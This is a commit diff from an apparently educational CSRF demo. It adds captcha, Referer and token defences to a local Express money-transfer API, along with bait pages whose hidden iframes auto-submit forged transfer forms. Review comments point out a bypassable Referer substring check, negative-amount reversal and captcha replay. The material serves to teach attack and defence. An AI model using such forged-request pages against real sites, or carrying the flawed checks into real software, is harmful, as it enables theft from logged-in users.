

CSRF
YvetteLau committed May 11, 2019
1 parent 3f064f5 commit 31fe42e
Showing 16 changed files with 1,077 additions and 10 deletions.
92 changes: 90 additions & 2 deletions Security/CSRF/server.js
@@ -7,7 +7,7 @@ const app = express();
const path = require('path');
const bodyParser = require('body-parser');
const cookieParser = require('cookie-parser');

const svgCaptcha = require('svg-captcha');

//设置路径
app.use(express.static(path.join(__dirname, 'src')));
@@ -40,10 +40,14 @@ app.post('/api/login', (req, res) => {

app.get('/api/userinfo', (req, res) => {
let info = session[req.cookies[SESSION_ID]];
/**增加验证码 */
//data:svg, text:验证码文本
let {data, text} = svgCaptcha.create();
if (info) {
//用户已经登录
let username = info.user.username;
res.json({ code: 0, info: { username, account: info.user.account } });
info.code = text; //下次请求时,对比验证码
res.json({ code: 0, info: { username, account: info.user.account, svg: data } });
} else {
res.json({ code: 1, error: 'user not logged in.' });
}
@@ -69,4 +73,88 @@ app.post('/api/transfer', (req, res) => {
}
});

//转账前,先验证 验证码
app.post('/api/transfer1', (req, res) => {
let info = session[req.cookies[SESSION_ID]];
if (info) {
//用户已经登录
let {payee, amount, code} = req.body;
if(code && code.toUpperCase() === info.code.toUpperCase() && Number(amount)) {
//验证码正确
let username = info.user.username;
userList.forEach(user => {
if(user.username === username) {
user.account -= amount;
}
if(user.username === payee) {
user.account += amount;
}
})
res.json({ code: 0 });
}else{
res.json({ code: 1, error: 'code error.' });
}

} else {
res.json({ code: 1, error: 'user not logged in.' });
}
});

//转账前,判断请求来源(referer)
app.post('/api/transfer2', (req, res) => {
let info = session[req.cookies[SESSION_ID]];
if (info) {
//用户已经登录
let {payee, amount} = req.body;
let referer = req.headers['referer'] || '';
if(Number(amount) && referer.includes('localhost:3001')) {
//referer正确
let username = info.user.username;
userList.forEach(user => {
if(user.username === username) {
user.account -= amount;
}
if(user.username === payee) {
user.account += amount;
}
})
res.json({ code: 0 });
}else{
res.json({ code: 1, error: 'illegal source of request .' });
}

} else {
res.json({ code: 1, error: 'user not logged in.' });
}
});


//转账前,先验证 token
app.post('/api/transfer3', (req, res) => {
let info = session[req.cookies[SESSION_ID]];
if (info) {
//用户已经登录
let {payee, amount, token} = req.body;
console.log(token, 'mytoken_' + req.cookies[SESSION_ID])
if(token === 'mytoken_' + req.cookies[SESSION_ID] && Number(amount)) {
//token 正确
let username = info.user.username;
userList.forEach(user => {
if(user.username === username) {
user.account -= amount;
}
if(user.username === payee) {
user.account += amount;
}
})
res.json({ code: 0 });
}else{
res.json({ code: 1, error: 'illegal.' });
}

} else {
res.json({ code: 1, error: 'user not logged in.' });
}
});

app.listen(3001);
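Review bot: The Referer check in `/api/transfer2` is a substring test, `referer.includes('localhost:3001')`, so a request whose Referer is `http://localhost:3001.attacker.test/` or `http://attacker.test/localhost:3001` passes it; compare a parsed host instead, and prefer the `Origin` header when present: `const src = req.headers['origin'] || req.headers['referer'] || '';` / `let host = ''; try { host = new URL(src).host; } catch (e) {}` / `if (Number(amount) > 0 && host === 'localhost:3001') {`. The `Number(amount)` truthiness test used by all three new handlers also accepts negative values, which reverses the direction of the transfer, and because `amount` is then used unconverted, a string value (what a urlencoded form sends) makes `user.account += amount` concatenate rather than add — coerce once with `const n = Number(amount);`, reject unless `n > 0`, and use `n` in both account updates. `/api/transfer1` never clears `info.code` after a successful match, so one captcha answer can be replayed until `/api/userinfo` issues a new one; set `info.code = null` before performing the transfer. In `/api/transfer3` the `console.log(token, 'mytoken_' + req.cookies[SESSION_ID])` line writes the session id to stdout and should be dropped.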
26 changes: 25 additions & 1 deletion Security/CSRF/src/fake.html
@@ -1,12 +1,36 @@
<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>你被骗了</title>
</head>

<body>

<!-- 偷偷转走你的钱: 3001端口的cookie被自动带去了3001的服务器 -->
<!-- 表单没有跨域问题 -->
<form name="sneak" action="http://localhost:3001/api/transfer" method="post">
<input type="text" name="payee" value="yvette" />
<input type="text" name="amount" value="2000" />
</form>

<!-- 有验证码的接口 -->
<!-- 虽然用户已经登录,但是需要验证码,验证码匹配错误,不能转走钱 -->
<form name="sneak1" action="http://localhost:3001/api/transfer1" method="post">
<input type="text" name="payee" value="yvette" />
<input type="text" name="amount" value="2000" />
</form>
</body>
<script>
window.onload = function () {
/**
* 以下语句,每次放开对应的一个即可
*/
document.sneak.submit(); //没有防御CSRF攻击
// document.sneak1.submit(); //有验证码的情况
}
</script>

</html>
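Review bot: The comment above the `sneak` form states that the port-3001 cookie is carried along automatically, which holds only when that cookie is not `SameSite=Lax`/`Strict`; current browsers default to Lax, so a cross-site POST from a hidden iframe (the way fish.html embeds this page) would be sent without the session cookie and the demo would fail silently. Worth saying in the comment, e.g. `<!-- relies on the session cookie being sent cross-site: with the SameSite=Lax browser default, a POST from a cross-site iframe will not carry it -->`, and since the `SameSite` attribute is itself a CSRF mitigation it belongs alongside the captcha, Referer and token variants this commit adds. Whether the phishing pages are really served from a second origin is not visible here — fish.html reaches this page via the relative URL `/fake.html` — and if both live on `localhost:3001` the request is same-site and no cross-site defence is being exercised at all.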
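--- /dev/null
+++ b/Security/CSRF/src/fake1.html
@@ -0,0 +1,25 @@
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<meta http-equiv="X-UA-Compatible" content="ie=edge">
+<title>你被骗了</title>
+</head>
+
+<body>
+<!-- 有验证码的接口 -->
+<!-- 虽然用户已经登录,但是需要验证码,验证码匹配错误,不能转走钱 -->
+<form name="sneak1" action="http://localhost:3001/api/transfer1" method="post">
+<input type="text" name="payee" value="yvette" />
+<input type="text" name="amount" value="2000" />
+</form>
+</body>
+<script>
+window.onload = function () {
+document.sneak1.submit(); //有验证码的情况
+}
+</script>
+
+</html>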
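--- /dev/null
+++ b/Security/CSRF/src/fake2.html
@@ -0,0 +1,25 @@
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<meta http-equiv="X-UA-Compatible" content="ie=edge">
+<title>你被骗了</title>
+</head>
+
+<body>
+<!-- 判断来源的接口 -->
+<!-- 虽然用户已经登录,但是需要服务端会判断请求的来源,来源错误,不能转走钱 -->
+<form name="sneak1" action="http://localhost:3001/api/transfer2" method="post">
+<input type="text" name="payee" value="yvette" />
+<input type="text" name="amount" value="2000" />
+</form>
+</body>
+<script>
+window.onload = function () {
+document.sneak1.submit(); //有验证码的情况
+}
+</script>
+
+</html>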
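Review bot: The comment on the `document.sneak1.submit()` line still reads `//有验证码的情况` (the captcha case), carried over from fake1.html, although this page posts to `/api/transfer2`, the Referer-checked endpoint; change it to `document.sneak1.submit(); // referer-checked endpoint`. Since this page is the only place the Referer defence is exercised, a note that the browser, not the page, sets the Referer of a form submission (the attacker's HTML cannot forge it, it can only suppress it with a referrer policy) would make what the demo shows clearer.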
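--- /dev/null
+++ b/Security/CSRF/src/fake3.html
@@ -0,0 +1,25 @@
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<meta http-equiv="X-UA-Compatible" content="ie=edge">
+<title>你被骗了</title>
+</head>
+
+<body>
+<!-- 增加token -->
+<!-- 虽然用户已经登录,但是需要服务端会判断token,没有 token 或者 token 不正确,不能转走钱 -->
+<form name="sneak1" action="http://localhost:3001/api/transfer3" method="post">
+<input type="text" name="payee" value="yvette" />
+<input type="text" name="amount" value="2000" />
+</form>
+</body>
+<script>
+window.onload = function () {
+document.sneak1.submit(); //有验证码的情况
+}
+</script>
+
+</html>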
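Review bot: The comment on the `document.sneak1.submit()` line says `//有验证码的情况` (the captcha case), copied from fake1.html, but this page targets `/api/transfer3`, the token-checked endpoint; change it to `document.sneak1.submit(); // token-checked endpoint: form deliberately carries no token field`. It is worth spelling out in the form comment why the attack fails here: the expected token is derived from the session cookie, which a page on another origin cannot read, so the attacker cannot include a matching `token` field even though the browser still attaches the cookie.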
9 changes: 7 additions & 2 deletions Security/CSRF/src/fish.html
@@ -1,14 +1,19 @@
<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>嘿嘿嘿</title>
</head>

<body>
<a style="display: block" href="/fake.html"><img width="600"src="http://b4-q.mafengwo.net/s12/M00/FE/AE/wKgED1v772uAa_VkAA3UNOJhbkE35.jpeg?imageMogr2%2Fthumbnail%2F1360x%2Fstrip%2Fquality%2F90"/>
<p>小姐姐教你如何脱单?</p></a>
<img width="600"
src="http://b4-q.mafengwo.net/s12/M00/FE/AE/wKgED1v772uAa_VkAA3UNOJhbkE35.jpeg?imageMogr2%2Fthumbnail%2F1360x%2Fstrip%2Fquality%2F90" />
<p>你的钱被偷走了~</p>
<a href="http://localhost:3001/">返回查看余额</a>
<iframe src="/fake.html" style="display: none"></iframe>
</body>

</html>
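--- /dev/null
+++ b/Security/CSRF/src/fish1.html
@@ -0,0 +1,19 @@
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<meta http-equiv="X-UA-Compatible" content="ie=edge">
+<title>嘿嘿嘿</title>
+</head>
+
+<body>
+<img width="600"
+src="http://b4-q.mafengwo.net/s12/M00/FE/AE/wKgED1v772uAa_VkAA3UNOJhbkE35.jpeg?imageMogr2%2Fthumbnail%2F1360x%2Fstrip%2Fquality%2F90" />
+<p>你的钱还很安全~</p>
+<a href="http://localhost:3001/safe1.html">返回查看余额</a>
+<iframe src="/fake1.html" style="display: none"></iframe>
+</body>
+
+</html>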
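--- /dev/null
+++ b/Security/CSRF/src/fish2.html
@@ -0,0 +1,19 @@
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<meta http-equiv="X-UA-Compatible" content="ie=edge">
+<title>嘿嘿嘿</title>
+</head>
+
+<body>
+<img width="600"
+src="http://b4-q.mafengwo.net/s12/M00/FE/AE/wKgED1v772uAa_VkAA3UNOJhbkE35.jpeg?imageMogr2%2Fthumbnail%2F1360x%2Fstrip%2Fquality%2F90" />
+<p>你的钱还很安全~</p>
+<a href="http://localhost:3001/safe2.html">返回查看余额</a>
+<iframe src="/fake1.html" style="display: none"></iframe>
+</body>
+
+</html>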
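Review bot: The hidden iframe on this page loads `/fake1.html`, whose form posts to the captcha endpoint `/api/transfer1`, so the Referer-checked endpoint this page is paired with (its link goes back to `safe2.html`) is never requested and the "your money is safe" message says nothing about the Referer defence; change the line to `<iframe src="/fake2.html" style="display: none"></iframe>`. It also looks like a copy of fish1.html with only the link updated, which is how the iframe target was missed.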
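--- /dev/null
+++ b/Security/CSRF/src/fish3.html
@@ -0,0 +1,19 @@
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<meta http-equiv="X-UA-Compatible" content="ie=edge">
+<title>嘿嘿嘿</title>
+</head>
+
+<body>
+<img width="600"
+src="http://b4-q.mafengwo.net/s12/M00/FE/AE/wKgED1v772uAa_VkAA3UNOJhbkE35.jpeg?imageMogr2%2Fthumbnail%2F1360x%2Fstrip%2Fquality%2F90" />
+<p>你的钱还很安全~</p>
+<a href="http://localhost:3001/safe3.html">返回查看余额</a>
+<iframe src="/fake1.html" style="display: none"></iframe>
+</body>
+
+</html>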
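Review bot: The hidden iframe here loads `/fake1.html`, which posts to the captcha endpoint `/api/transfer1`, so the token-checked endpoint this page is meant to demonstrate (its link returns to `safe3.html`) is never exercised; change the line to `<iframe src="/fake3.html" style="display: none"></iframe>`. As written, the page proves only that the captcha defence holds, not the token one.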
6 changes: 3 additions & 3 deletions Security/CSRF/src/index.html
@@ -33,7 +33,7 @@ <h5>
<input class="form-control" type="text" id="amount" />
</div>
<div class="form-group">
<input class="btn btn-primary" type="submit" id="transfer" value="登录" />
<input class="btn btn-primary" type="submit" id="transfer" value="转账" />
</div>
</form>
</div>
@@ -74,8 +74,8 @@ <h5>
//重新获取用户信息
getUserInfo();
} else {
//登录失败(如果是用户登录成功时,还能够获取到用户的cookie)
location.href = `/login.html`;
//失败
// location.href = `/login.html`;
}
});
});
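Review bot: With the redirect to `/login.html` commented out, the failure branch of the transfer callback is now empty, so a rejected transfer — including the server's `code error.` and `illegal source of request .` responses — gives the user no feedback at all; surface the response's `error` field there, e.g. `alert(res.error);` (the name of the response variable is outside this hunk, adjust accordingly). Leaving commented-out code behind `//失败` also obscures that the redirect was removed on purpose; delete the line and say why in the comment. The enclosing callback begins before this hunk.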
